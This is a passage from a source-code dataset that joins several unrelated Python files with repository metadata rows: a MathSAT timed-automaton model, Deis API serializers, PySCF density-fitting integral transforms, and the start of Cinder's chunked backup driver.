                 run, mid, x_mid, id0, x_id0,
                 prop, x_prop, same_id, max_prop,
                 delta, x_delta):
        super().__init__(name, menv, enc)
        real_type = msat_get_rational_type(menv)
        loc_symbs, locs, x_locs = self._enum("l", 4)
        x, x_x = self._symb("x", real_type)
        saved, x_saved = self._symb("saved_max", real_type)
        # Symbolic names for the 4 locations (current and next state).
        idle = locs[0]
        wait = locs[1]
        req = locs[2]
        cs = locs[3]
        x_idle = x_locs[0]
        x_wait = x_locs[1]
        x_req = x_locs[2]
        x_cs = x_locs[3]
        self.symb2next = {x: x_x, saved: x_saved}
        for s, x_s in loc_symbs:
            assert s not in self.symb2next
            self.symb2next[s] = x_s
        # Frame predicate: location unchanged.
        same_loc = msat_make_iff(menv, loc_symbs[0][1], loc_symbs[0][0])
        for s, x_s in loc_symbs[1:]:
            same_loc = msat_make_and(menv, same_loc,
                                     msat_make_iff(menv, x_s, s))
        # bound loc
        self.init = msat_make_or(menv,
                                 msat_make_or(menv, idle, wait),
                                 msat_make_or(menv, req, cs))
        self.trans = msat_make_or(menv,
                                  msat_make_or(menv, x_idle, x_wait),
                                  msat_make_or(menv, x_req, x_cs))
        zero = msat_make_number(menv, "0")
        # idle & x = 0 & saved_max = max_prop
        self.init = msat_make_and(
            menv,
            msat_make_and(menv, self.init, idle),
            msat_make_and(menv,
                          msat_make_equal(menv, x, zero),
                          msat_make_equal(menv, saved, max_prop)))
        # invar: prop > 0
        self.init = msat_make_and(menv, self.init,
                                  msat_make_gt(menv, prop, zero))
        self.trans = msat_make_and(menv, self.trans,
                                   msat_make_gt(menv, x_prop, zero))
        # invar: (location = req) -> x <= prop
        self.init = msat_make_and(
            menv, self.init,
            msat_make_impl(menv, req, msat_make_leq(menv, x, prop)))
        self.trans = msat_make_and(
            menv, self.trans,
            msat_make_impl(menv, x_req, msat_make_leq(menv, x_x, x_prop)))
        # Timed step (or not scheduled): everything frozen, clock advances.
        # (delta > 0 | !run) -> loc' = loc & x' = x + delta &
        # saved_max' = saved_max & prop' = prop
        lhs = msat_make_or(menv,
                           msat_make_gt(menv, delta, zero),
                           msat_make_not(menv, run))
        rhs = msat_make_and(
            menv,
            msat_make_and(menv, same_loc,
                          msat_make_equal(menv, x_x,
                                          msat_make_plus(menv, x, delta))),
            msat_make_and(menv,
                          msat_make_equal(menv, x_saved, saved),
                          msat_make_equal(menv, x_prop, prop)))
        self.trans = msat_make_and(menv, self.trans,
                                   msat_make_impl(menv, lhs, rhs))
        # Discrete step: this process is scheduled and no time passes.
        disc_t = msat_make_and(menv, run, msat_make_equal(menv, delta, zero))
        # loc = idle -> (loc' = req & x' = 0 & id' = id &
        #                prop' = prop & saved_max' = max_prop)
        lhs = msat_make_and(menv, disc_t, idle)
        rhs = msat_make_and(menv,
                            msat_make_and(menv, x_req,
                                          msat_make_equal(menv, x_x, zero)),
                            msat_make_and(menv, same_id,
                                          msat_make_equal(menv, x_prop, prop)))
        rhs = msat_make_and(menv, rhs,
                            msat_make_equal(menv, x_saved, max_prop))
        self.trans = msat_make_and(menv, self.trans,
                                   msat_make_impl(menv, lhs, rhs))
        # loc = req -> (loc' = wait & x' = 0 & id' = pid & prop' = prop &
        #               saved_max' = max_prop)
        lhs = msat_make_and(menv, disc_t, req)
        rhs = msat_make_and(menv,
                            msat_make_and(menv, x_wait,
                                          msat_make_equal(menv, x_x, zero)),
                            msat_make_and(menv, x_mid,
                                          msat_make_equal(menv, x_prop, prop)))
        rhs = msat_make_and(menv, rhs,
                            msat_make_equal(menv, x_saved, max_prop))
        self.trans = msat_make_and(menv, self.trans,
                                   msat_make_impl(menv, lhs, rhs))
        # loc = wait -> (id' = id & prop' = prop & saved' = max_prop &
        #                (loc' = idle & x' = 0) | (loc' = cs & x' = x))
        disj = msat_make_or(menv,
                            msat_make_and(menv, x_idle,
                                          msat_make_equal(menv, x_x, zero)),
                            msat_make_and(menv, x_cs,
                                          msat_make_equal(menv, x_x, x)))
        lhs = msat_make_and(menv, disc_t, wait)
        rhs = msat_make_and(
            menv,
            msat_make_and(menv, same_id,
                          msat_make_equal(menv, x_prop, prop)),
            msat_make_and(menv,
                          msat_make_equal(menv, x_saved, max_prop),
                          disj))
        self.trans = msat_make_and(menv, self.trans,
                                   msat_make_impl(menv, lhs, rhs))
        # loc = cs -> (loc' = idle & x' = x & id' = 0 & prop' < prop &
        #              saved_max' = max_prop)
        lhs = msat_make_and(menv, disc_t, cs)
        rhs = msat_make_and(menv,
                            msat_make_and(menv, x_idle,
                                          msat_make_equal(menv, x_x, x)),
                            msat_make_and(menv, x_id0,
                                          msat_make_lt(menv, x_prop, prop)))
        rhs = msat_make_and(menv, rhs,
                            msat_make_equal(menv, x_saved, max_prop))
        self.trans = msat_make_and(menv, self.trans,
                                   msat_make_impl(menv, lhs, rhs))
683b63fe56064ede009369a9af5296ad1f5f1798 | 13,331 | py | Python | controller/api/serializers.py | rochacon/deis | 6839b592a1ff9c468a8c91f5f2b6817aebd5ae86 | [
"Apache-2.0"
] | 1 | 2019-11-18T19:56:21.000Z | 2019-11-18T19:56:21.000Z | controller/api/serializers.py | rochacon/deis | 6839b592a1ff9c468a8c91f5f2b6817aebd5ae86 | [
"Apache-2.0"
] | null | null | null | controller/api/serializers.py | rochacon/deis | 6839b592a1ff9c468a8c91f5f2b6817aebd5ae86 | [
"Apache-2.0"
] | null | null | null | """
Classes to serialize the RESTful representation of Deis API models.
"""
from __future__ import unicode_literals
import json
import re
from django.conf import settings
from django.contrib.auth.models import User
from django.utils import timezone
from rest_framework import serializers
from rest_framework.validators import UniqueTogetherValidator
from api import models
# Process type names: one or more lowercase letters (e.g. "web", "worker").
PROCTYPE_MATCH = re.compile(r'^(?P<type>[a-z]+)')
# Memory limits: integer followed by a unit (B/K/M/G or KB/MB/GB), any case.
MEMLIMIT_MATCH = re.compile(r'^(?P<mem>[0-9]+(MB|KB|GB|[BKMG]))$', re.IGNORECASE)
# CPU shares: a plain non-negative integer.
CPUSHARE_MATCH = re.compile(r'^(?P<cpu>[0-9]+)$')
# Tag keys: lowercase letters only.
TAGKEY_MATCH = re.compile(r'^[a-z]+$')
# Tag values: word characters only.
TAGVAL_MATCH = re.compile(r'^\w+$')
class JSONFieldSerializer(serializers.Field):
    """DRF field for values stored as JSON-compatible data."""

    def to_representation(self, obj):
        """Read path: the stored object is already JSON-compatible."""
        return obj

    def to_internal_value(self, data):
        """Write path: parse a JSON string; pass through parsed input."""
        try:
            return json.loads(data)
        except TypeError:
            # `data` was not a string (already a dict/list/...); keep as-is.
            return data
class JSONIntFieldSerializer(JSONFieldSerializer):
    """
    A JSON serializer that coerces its data to integers.
    """
    def to_internal_value(self, data):
        """Deserialize the field's JSON integer data."""
        field = super(JSONIntFieldSerializer, self).to_internal_value(data)
        # NOTE: Python 2 dict API (viewitems); values coerced in place.
        for k, v in field.viewitems():
            if v is not None:  # NoneType is used to unset a value
                try:
                    field[k] = int(v)
                except ValueError:
                    field[k] = v
                    # Do nothing, the validator will catch this later
        return field
class JSONStringFieldSerializer(JSONFieldSerializer):
    """
    A JSON serializer that coerces its data to strings.
    """
    def to_internal_value(self, data):
        """Deserialize the field's JSON string data."""
        field = super(JSONStringFieldSerializer, self).to_internal_value(data)
        for k, v in field.viewitems():
            if v is not None:  # NoneType is used to unset a value
                # Python 2 `unicode` coercion.
                field[k] = unicode(v)
        return field
class ModelSerializer(serializers.ModelSerializer):
    """Base serializer exposing the model's read-only `uuid`."""

    uuid = serializers.ReadOnlyField()

    def get_validators(self):
        """
        Hack to remove DRF's UniqueTogetherValidator when it concerns the UUID.
        See https://github.com/deis/deis/pull/2898#discussion_r23105147
        """
        validators = super(ModelSerializer, self).get_validators()
        for v in validators:
            if isinstance(v, UniqueTogetherValidator) and 'uuid' in v.fields:
                validators.remove(v)
        return validators
class UserSerializer(serializers.ModelSerializer):
    """Serialize a Django auth :class:`User`, handling registration."""

    class Meta:
        model = User
        fields = ['email', 'username', 'password', 'first_name', 'last_name', 'is_superuser',
                  'is_staff', 'groups', 'user_permissions', 'last_login', 'date_joined',
                  'is_active']
        read_only_fields = ['is_superuser', 'is_staff', 'groups',
                            'user_permissions', 'last_login', 'date_joined', 'is_active']
        # Never echo the password back in responses.
        extra_kwargs = {'password': {'write_only': True}}

    def create(self, validated_data):
        """Create and save a new active user from validated signup data."""
        now = timezone.now()
        user = User(
            email=validated_data.get('email'),
            username=validated_data.get('username'),
            last_login=now,
            date_joined=now,
            is_active=True
        )
        if validated_data.get('first_name'):
            user.first_name = validated_data['first_name']
        if validated_data.get('last_name'):
            user.last_name = validated_data['last_name']
        user.set_password(validated_data['password'])
        # Make the first signup an admin / superuser
        if not User.objects.filter(is_superuser=True).exists():
            user.is_superuser = user.is_staff = True
        user.save()
        return user
class AdminUserSerializer(serializers.ModelSerializer):
    """Serialize admin status for a User model."""

    class Meta:
        model = User
        fields = ['username', 'is_superuser']
        read_only_fields = ['username']
class AppSerializer(ModelSerializer):
    """Serialize a :class:`~api.models.App` model."""

    owner = serializers.ReadOnlyField(source='owner.username')
    # Process structure (type -> count) stored as JSON.
    structure = JSONFieldSerializer(required=False)
    created = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
    updated = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)

    class Meta:
        """Metadata options for a :class:`AppSerializer`."""
        model = models.App
        fields = ['uuid', 'id', 'owner', 'url', 'structure', 'created', 'updated']
        read_only_fields = ['uuid']
class BuildSerializer(ModelSerializer):
    """Serialize a :class:`~api.models.Build` model."""

    app = serializers.SlugRelatedField(slug_field='id', queryset=models.App.objects.all())
    owner = serializers.ReadOnlyField(source='owner.username')
    # Procfile contents (process type -> command) stored as JSON.
    procfile = JSONFieldSerializer(required=False)
    created = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
    updated = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)

    class Meta:
        """Metadata options for a :class:`BuildSerializer`."""
        model = models.Build
        fields = ['owner', 'app', 'image', 'sha', 'procfile', 'dockerfile', 'created',
                  'updated', 'uuid']
        read_only_fields = ['uuid']
class ConfigSerializer(ModelSerializer):
    """Serialize a :class:`~api.models.Config` model.

    Validators enforce the per-process-type formats for memory limits,
    CPU shares, and tags; a `None` value in any mapping unsets the key.
    """

    app = serializers.SlugRelatedField(slug_field='id', queryset=models.App.objects.all())
    owner = serializers.ReadOnlyField(source='owner.username')
    values = JSONStringFieldSerializer(required=False)
    memory = JSONStringFieldSerializer(required=False)
    cpu = JSONIntFieldSerializer(required=False)
    tags = JSONStringFieldSerializer(required=False)
    created = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
    updated = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)

    class Meta:
        """Metadata options for a :class:`ConfigSerializer`."""
        model = models.Config

    def validate_memory(self, value):
        """Check proc-type keys and `<number><unit>` memory limit values."""
        for k, v in value.viewitems():
            if v is None:  # use NoneType to unset a value
                continue
            if not re.match(PROCTYPE_MATCH, k):
                raise serializers.ValidationError("Process types can only contain [a-z]")
            if not re.match(MEMLIMIT_MATCH, str(v)):
                raise serializers.ValidationError(
                    "Limit format: <number><unit>, where unit = B, K, M or G")
        return value

    def validate_cpu(self, value):
        """Check proc-type keys and integer CPU shares in [0, 1024]."""
        for k, v in value.viewitems():
            if v is None:  # use NoneType to unset a value
                continue
            if not re.match(PROCTYPE_MATCH, k):
                raise serializers.ValidationError("Process types can only contain [a-z]")
            shares = re.match(CPUSHARE_MATCH, str(v))
            if not shares:
                raise serializers.ValidationError("CPU shares must be an integer")
            for v in shares.groupdict().viewvalues():
                try:
                    i = int(v)
                except ValueError:
                    raise serializers.ValidationError("CPU shares must be an integer")
                if i > 1024 or i < 0:
                    raise serializers.ValidationError("CPU shares must be between 0 and 1024")
        return value

    def validate_tags(self, value):
        """Check tag keys ([a-z]+) and tag values (word characters)."""
        for k, v in value.viewitems():
            if v is None:  # use NoneType to unset a value
                continue
            if not re.match(TAGKEY_MATCH, k):
                raise serializers.ValidationError("Tag keys can only contain [a-z]")
            if not re.match(TAGVAL_MATCH, str(v)):
                raise serializers.ValidationError("Invalid tag value")
        return value
class ReleaseSerializer(ModelSerializer):
    """Serialize a :class:`~api.models.Release` model."""

    app = serializers.SlugRelatedField(slug_field='id', queryset=models.App.objects.all())
    owner = serializers.ReadOnlyField(source='owner.username')
    created = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
    updated = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)

    class Meta:
        """Metadata options for a :class:`ReleaseSerializer`."""
        model = models.Release
class ContainerSerializer(ModelSerializer):
    """Serialize a :class:`~api.models.Container` model."""

    app = serializers.SlugRelatedField(slug_field='id', queryset=models.App.objects.all())
    owner = serializers.ReadOnlyField(source='owner.username')
    created = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
    updated = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
    release = serializers.SerializerMethodField()

    class Meta:
        """Metadata options for a :class:`ContainerSerializer`."""
        model = models.Container
        fields = ['owner', 'app', 'release', 'type', 'num', 'state', 'created', 'updated', 'uuid']

    def get_release(self, obj):
        """Render the release as its human-readable version tag, e.g. "v3"."""
        return "v{}".format(obj.release.version)
class KeySerializer(ModelSerializer):
    """Serialize a :class:`~api.models.Key` model."""

    owner = serializers.ReadOnlyField(source='owner.username')
    # Computed from the public key material; never writable.
    fingerprint = serializers.CharField(read_only=True)
    created = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
    updated = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)

    class Meta:
        """Metadata options for a KeySerializer."""
        model = models.Key
class DomainSerializer(ModelSerializer):
    """Serialize a :class:`~api.models.Domain` model."""

    app = serializers.SlugRelatedField(slug_field='id', queryset=models.App.objects.all())
    owner = serializers.ReadOnlyField(source='owner.username')
    created = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
    updated = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)

    class Meta:
        """Metadata options for a :class:`DomainSerializer`."""
        model = models.Domain
        fields = ['uuid', 'owner', 'created', 'updated', 'app', 'domain']

    def validate_domain(self, value):
        """
        Check that the hostname is valid

        Enforces RFC-style label rules, rejects wildcards, and ensures the
        domain is not already attached to another app. xip.io hostnames are
        accepted without label validation.
        """
        if len(value) > 255:
            raise serializers.ValidationError('Hostname must be 255 characters or less.')
        if value[-1:] == ".":
            value = value[:-1]  # strip exactly one dot from the right, if present
        labels = value.split('.')
        if 'xip.io' in value:
            return value
        if labels[0] == '*':
            raise serializers.ValidationError(
                'Adding a wildcard subdomain is currently not supported.')
        # Each label: 1-63 chars, alphanumeric or hyphen, no leading/trailing hyphen.
        allowed = re.compile("^(?!-)[a-z0-9-]{1,63}(?<!-)$", re.IGNORECASE)
        for label in labels:
            match = allowed.match(label)
            if not match or '--' in label or label.isdigit() or \
               len(labels) == 1 and any(char.isdigit() for char in label):
                raise serializers.ValidationError('Hostname does not look valid.')
        if models.Domain.objects.filter(domain=value).exists():
            raise serializers.ValidationError(
                "The domain {} is already in use by another app".format(value))
        return value
class CertificateSerializer(ModelSerializer):
    """Serialize a :class:`~api.models.Cert` model."""

    owner = serializers.ReadOnlyField(source='owner.username')
    expires = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
    created = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
    updated = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)

    class Meta:
        """Metadata options for a DomainCertSerializer."""
        model = models.Certificate
        # Private key material is write-only; it is never echoed back.
        extra_kwargs = {'certificate': {'write_only': True},
                        'key': {'write_only': True},
                        'common_name': {'required': False}}
        read_only_fields = ['expires', 'created', 'updated']
class PushSerializer(ModelSerializer):
    """Serialize a :class:`~api.models.Push` model."""

    app = serializers.SlugRelatedField(slug_field='id', queryset=models.App.objects.all())
    owner = serializers.ReadOnlyField(source='owner.username')
    created = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
    updated = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)

    class Meta:
        """Metadata options for a :class:`PushSerializer`."""
        model = models.Push
        fields = ['uuid', 'owner', 'app', 'sha', 'fingerprint', 'receive_user', 'receive_repo',
                  'ssh_connection', 'ssh_original_command', 'created', 'updated']
a51f126876a2e5ae1c72e44b18ef75383b05b813 | 7,868 | py | Python | pyscf/pbc/df/df_ao2mo.py | nmardirossian/pyscf | 57c8912dcfcc1157a822feede63df54ed1067115 | [
"BSD-2-Clause"
] | 1 | 2018-05-02T19:55:30.000Z | 2018-05-02T19:55:30.000Z | pyscf/pbc/df/df_ao2mo.py | nmardirossian/pyscf | 57c8912dcfcc1157a822feede63df54ed1067115 | [
"BSD-2-Clause"
] | null | null | null | pyscf/pbc/df/df_ao2mo.py | nmardirossian/pyscf | 57c8912dcfcc1157a822feede63df54ed1067115 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
import numpy
from pyscf import lib
from pyscf import ao2mo
from pyscf.ao2mo import _ao2mo
from pyscf.ao2mo.incore import iden_coeffs, _conc_mos
from pyscf.pbc.df.df_jk import zdotNN, zdotCN, zdotNC
from pyscf.pbc.df.fft_ao2mo import _format_kpts
from pyscf.pbc.lib.kpts_helper import is_zero, gamma_point
def get_eri(mydf, kpts=None, compact=True):
    """Assemble 4-center AO electron repulsion integrals by contracting
    3-center density-fitting blocks streamed from ``mydf.sr_loop``.

    Four k-point cases are handled: gamma point (real, s4 symmetry),
    ki==kk/kj==kl, ki==kl/kj==kk (exchange-like), and the general complex
    case where bra and ket come from two different sr_loop streams.
    """
    if mydf._cderi is None:
        mydf.build()
    cell = mydf.cell
    kptijkl = _format_kpts(kpts)
    kpti, kptj, kptk, kptl = kptijkl
    nao = cell.nao_nr()
    nao_pair = nao * (nao+1) // 2
    # Reserve room for the nao^4 output (8 bytes/elem) before streaming.
    max_memory = max(2000, mydf.max_memory-lib.current_memory()[0]-nao**4*8/1e6)
    ####################
    # gamma point, the integral is real and with s4 symmetry
    if gamma_point(kptijkl):
        eriR = numpy.zeros((nao_pair,nao_pair))
        for LpqR, LpqI in mydf.sr_loop(kptijkl[:2], max_memory, True):
            # Accumulate (L|pq)^T (L|rs) over auxiliary-basis blocks.
            lib.ddot(LpqR.T, LpqR, 1, eriR, 1)
            LpqR = LpqI = None
        if not compact:
            eriR = ao2mo.restore(1, eriR, nao).reshape(nao**2,-1)
        return eriR
    elif is_zero(kpti-kptk) and is_zero(kptj-kptl):
        eriR = numpy.zeros((nao*nao,nao*nao))
        eriI = numpy.zeros((nao*nao,nao*nao))
        for LpqR, LpqI in mydf.sr_loop(kptijkl[:2], max_memory, False):
            zdotNN(LpqR.T, LpqI.T, LpqR, LpqI, 1, eriR, eriI, 1)
            LpqR = LpqI = None
        return eriR + eriI*1j
    ####################
    # (kpt) i == j == k == l != 0
    #
    # (kpt) i == l && j == k && i != j && j != k  =>
    # both vbar and ovlp are zero. It corresponds to the exchange integral.
    #
    # complex integrals, N^4 elements
    elif is_zero(kpti-kptl) and is_zero(kptj-kptk):
        eriR = numpy.zeros((nao*nao,nao*nao))
        eriI = numpy.zeros((nao*nao,nao*nao))
        for LpqR, LpqI in mydf.sr_loop(kptijkl[:2], max_memory, False):
            zdotNC(LpqR.T, LpqI.T, LpqR, LpqI, 1, eriR, eriI, 1)
            LpqR = LpqI = None
        # transpose(0,1,3,2) because
        # j == k && i == l  =>
        # (L|ij).transpose(0,2,1).conj() = (L^*|ji) = (L^*|kl)  => (M|kl)
        eri = lib.transpose((eriR+eriI*1j).reshape(-1,nao,nao), axes=(0,2,1))
        return eri.reshape(nao**2,-1)
    ####################
    # aosym = s1, complex integrals
    #
    # kpti == kptj  =>  kptl == kptk
    # If kpti == kptj, (kptl-kptk)*a has to be multiples of 2pi because of the wave
    # vector symmetry.  k is a fraction of reciprocal basis, 0 < k/b < 1, by definition.
    # So  kptl/b - kptk/b  must be -1 < k/b < 1.
    #
    else:
        eriR = numpy.zeros((nao*nao,nao*nao))
        eriI = numpy.zeros((nao*nao,nao*nao))
        # Bra (ij) and ket (kl) blocks come from two different streams here.
        for (LpqR, LpqI), (LrsR, LrsI) in \
                lib.izip(mydf.sr_loop(kptijkl[:2], max_memory, False),
                         mydf.sr_loop(kptijkl[2:], max_memory, False)):
            zdotNN(LpqR.T, LpqI.T, LrsR, LrsI, 1, eriR, eriI, 1)
            LpqR = LpqI = LrsR = LrsI = None
        return eriR + eriI*1j
def general(mydf, mo_coeffs, kpts=None, compact=True):
    """MO-basis integral transformation (pq|rs) -> (ij|kl) driven by the
    3-center density-fitting tensor streamed from ``mydf.sr_loop``.

    mo_coeffs may be a single 2D array (used for all four indices) or a
    sequence of four coefficient matrices.  The four k-point cases mirror
    ``get_eri`` above.

    Fix: ``dtype=numpy.complex`` used the deprecated builtin alias that was
    removed in NumPy 1.24; it is replaced by the equivalent explicit dtype
    ``numpy.complex128``.
    """
    if mydf._cderi is None:
        mydf.build()
    kptijkl = _format_kpts(kpts)
    kpti, kptj, kptk, kptl = kptijkl
    if isinstance(mo_coeffs, numpy.ndarray) and mo_coeffs.ndim == 2:
        mo_coeffs = (mo_coeffs,) * 4
    all_real = not any(numpy.iscomplexobj(mo) for mo in mo_coeffs)
    max_memory = max(2000, (mydf.max_memory - lib.current_memory()[0]) * .5)
    ####################
    # gamma point, the integral is real and with s4 symmetry
    if gamma_point(kptijkl) and all_real:
        ijmosym, nij_pair, moij, ijslice = _conc_mos(mo_coeffs[0], mo_coeffs[1], compact)
        klmosym, nkl_pair, mokl, klslice = _conc_mos(mo_coeffs[2], mo_coeffs[3], compact)
        eri_mo = numpy.zeros((nij_pair,nkl_pair))
        # Transform the ket only once when bra and ket MOs coincide.
        sym = (iden_coeffs(mo_coeffs[0], mo_coeffs[2]) and
               iden_coeffs(mo_coeffs[1], mo_coeffs[3]))
        ijR = klR = None
        for LpqR, LpqI in mydf.sr_loop(kptijkl[:2], max_memory, True):
            ijR, klR = _dtrans(LpqR, ijR, ijmosym, moij, ijslice,
                               LpqR, klR, klmosym, mokl, klslice, sym)
            lib.ddot(ijR.T, klR, 1, eri_mo, 1)
            LpqR = LpqI = None
        return eri_mo
    elif is_zero(kpti-kptk) and is_zero(kptj-kptl):
        mo_coeffs = _mo_as_complex(mo_coeffs)
        nij_pair, moij, ijslice = _conc_mos(mo_coeffs[0], mo_coeffs[1])[1:]
        nkl_pair, mokl, klslice = _conc_mos(mo_coeffs[2], mo_coeffs[3])[1:]
        eri_mo = numpy.zeros((nij_pair,nkl_pair), dtype=numpy.complex128)
        sym = (iden_coeffs(mo_coeffs[0], mo_coeffs[2]) and
               iden_coeffs(mo_coeffs[1], mo_coeffs[3]))
        zij = zkl = None
        for LpqR, LpqI in mydf.sr_loop(kptijkl[:2], max_memory, False):
            buf = LpqR+LpqI*1j
            zij, zkl = _ztrans(buf, zij, moij, ijslice,
                               buf, zkl, mokl, klslice, sym)
            lib.dot(zij.T, zkl, 1, eri_mo, 1)
            LpqR = LpqI = buf = None
        return eri_mo
    ####################
    # (kpt) i == j == k == l != 0
    # (kpt) i == l && j == k && i != j && j != k  =>
    #
    elif is_zero(kpti-kptl) and is_zero(kptj-kptk):
        mo_coeffs = _mo_as_complex(mo_coeffs)
        nij_pair, moij, ijslice = _conc_mos(mo_coeffs[0], mo_coeffs[1])[1:]
        nlk_pair, molk, lkslice = _conc_mos(mo_coeffs[3], mo_coeffs[2])[1:]
        eri_mo = numpy.zeros((nij_pair,nlk_pair), dtype=numpy.complex128)
        sym = (iden_coeffs(mo_coeffs[0], mo_coeffs[3]) and
               iden_coeffs(mo_coeffs[1], mo_coeffs[2]))
        zij = zlk = None
        for LpqR, LpqI in mydf.sr_loop(kptijkl[:2], max_memory, False):
            buf = LpqR+LpqI*1j
            zij, zlk = _ztrans(buf, zij, moij, ijslice,
                               buf, zlk, molk, lkslice, sym)
            lib.dot(zij.T, zlk.conj(), 1, eri_mo, 1)
            LpqR = LpqI = buf = None
        nmok = mo_coeffs[2].shape[1]
        nmol = mo_coeffs[3].shape[1]
        # Swap the last two MO indices back to the (ij|kl) ordering.
        eri_mo = lib.transpose(eri_mo.reshape(-1,nmol,nmok), axes=(0,2,1))
        return eri_mo.reshape(nij_pair,nlk_pair)
    ####################
    # aosym = s1, complex integrals
    #
    # If kpti == kptj, (kptl-kptk)*a has to be multiples of 2pi because of the wave
    # vector symmetry.  k is a fraction of reciprocal basis, 0 < k/b < 1, by definition.
    # So  kptl/b - kptk/b  must be -1 < k/b < 1.  => kptl == kptk
    #
    else:
        mo_coeffs = _mo_as_complex(mo_coeffs)
        nij_pair, moij, ijslice = _conc_mos(mo_coeffs[0], mo_coeffs[1])[1:]
        nkl_pair, mokl, klslice = _conc_mos(mo_coeffs[2], mo_coeffs[3])[1:]
        eri_mo = numpy.zeros((nij_pair,nkl_pair), dtype=numpy.complex128)
        zij = zkl = None
        for (LpqR, LpqI), (LrsR, LrsI) in \
                lib.izip(mydf.sr_loop(kptijkl[:2], max_memory, False),
                         mydf.sr_loop(kptijkl[2:], max_memory, False)):
            zij, zkl = _ztrans(LpqR+LpqI*1j, zij, moij, ijslice,
                               LrsR+LrsI*1j, zkl, mokl, klslice, False)
            lib.dot(zij.T, zkl, 1, eri_mo, 1)
            LpqR = LpqI = LrsR = LrsI = None
        return eri_mo
def _mo_as_complex(mo_coeffs):
mos = []
for c in mo_coeffs:
if c.dtype == numpy.float64:
mos.append(c+0j)
else:
mos.append(c)
return mos
def _dtrans(Lpq, Lij, ijmosym, moij, ijslice,
            Lrs, Lkl, klmosym, mokl, klslice, sym):
    """Real AO->MO half-transformation of one DF block.

    When *sym* is true the kl transform is skipped and the ij result is
    reused for both bra and ket.
    """
    Lij = _ao2mo.nr_e2(Lpq, moij, ijslice, aosym='s2', mosym=ijmosym, out=Lij)
    Lkl = Lij if sym else _ao2mo.nr_e2(Lrs, mokl, klslice, aosym='s2',
                                       mosym=klmosym, out=Lkl)
    return Lij, Lkl
def _ztrans(Lpq, zij, moij, ijslice, Lrs, zkl, mokl, klslice, sym):
    """Complex AO->MO half-transformation of one DF block.

    Mirrors _dtrans for the complex case; *sym* reuses the ij result for kl.
    """
    # No time-reversal mapping and no shell offsets needed here.
    tao = []
    ao_loc = None
    zij = _ao2mo.r_e2(Lpq, moij, ijslice, tao, ao_loc, out=zij)
    zkl = zij if sym else _ao2mo.r_e2(Lrs, mokl, klslice, tao, ao_loc, out=zkl)
    return zij, zkl
| 38.568627 | 89 | 0.579944 |
b620c5e22ca4d96d36dfe289e863959f2ee7fcd0 | 32,517 | py | Python | cinder/backup/chunkeddriver.py | wzhou007/stx-cinder | bdc6cc8ae5466f218de5af835e9ec040d537c541 | [
"Apache-2.0"
] | null | null | null | cinder/backup/chunkeddriver.py | wzhou007/stx-cinder | bdc6cc8ae5466f218de5af835e9ec040d537c541 | [
"Apache-2.0"
] | null | null | null | cinder/backup/chunkeddriver.py | wzhou007/stx-cinder | bdc6cc8ae5466f218de5af835e9ec040d537c541 | [
"Apache-2.0"
] | null | null | null | # Copyright (C) 2012 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2014 TrilioData, Inc
# Copyright (c) 2015 EMC Corporation
# Copyright (C) 2015 Kevin Fox <kevin@efox.cc>
# Copyright (C) 2015 Tom Barron <tpb@dyncloud.net>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Generic base class to implement metadata, compression and chunked data
operations
"""
import abc
import hashlib
import json
import os
import eventlet
from oslo_config import cfg
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import excutils
from oslo_utils import units
import six
from cinder.backup import driver
from cinder import exception
from cinder.i18n import _
from cinder import objects
from cinder.objects import fields
from cinder.volume import utils as volume_utils
LOG = logging.getLogger(__name__)
# Driver-level config: the compression algorithm applied to each backup chunk.
# 'none'/'off'/'no' disable compression (see ChunkedBackupDriver._get_compressor).
chunkedbackup_service_opts = [
    cfg.StrOpt('backup_compression_algorithm',
               default='zlib',
               choices=['none', 'off', 'no',
                        'zlib', 'gzip',
                        'bz2', 'bzip2'],
               help='Compression algorithm (None to disable)'),
]
CONF = cfg.CONF
CONF.register_opts(chunkedbackup_service_opts)
@six.add_metaclass(abc.ABCMeta)
class ChunkedBackupDriver(driver.BackupDriver):
    """Abstract chunked backup driver.
    Implements common functionality for backup drivers that store volume
    data in multiple "chunks" in a backup repository when the size of
    the backed up cinder volume exceeds the size of a backup repository
    "chunk."
    Provides abstract methods to be implemented in concrete chunking
    drivers.
    """
    # Version stamp written into every backup's metadata, and the mapping
    # from stored metadata version to the restore method that understands it.
    DRIVER_VERSION = '1.0.0'
    DRIVER_VERSION_MAPPING = {'1.0.0': '_restore_v1'}
    def _get_compressor(self, algorithm):
        """Return the compression module for *algorithm*, or None when
        compression is disabled; raise ValueError for unknown names."""
        try:
            if algorithm.lower() in ('none', 'off', 'no'):
                return None
            elif algorithm.lower() in ('zlib', 'gzip'):
                import zlib as compressor
                return compressor
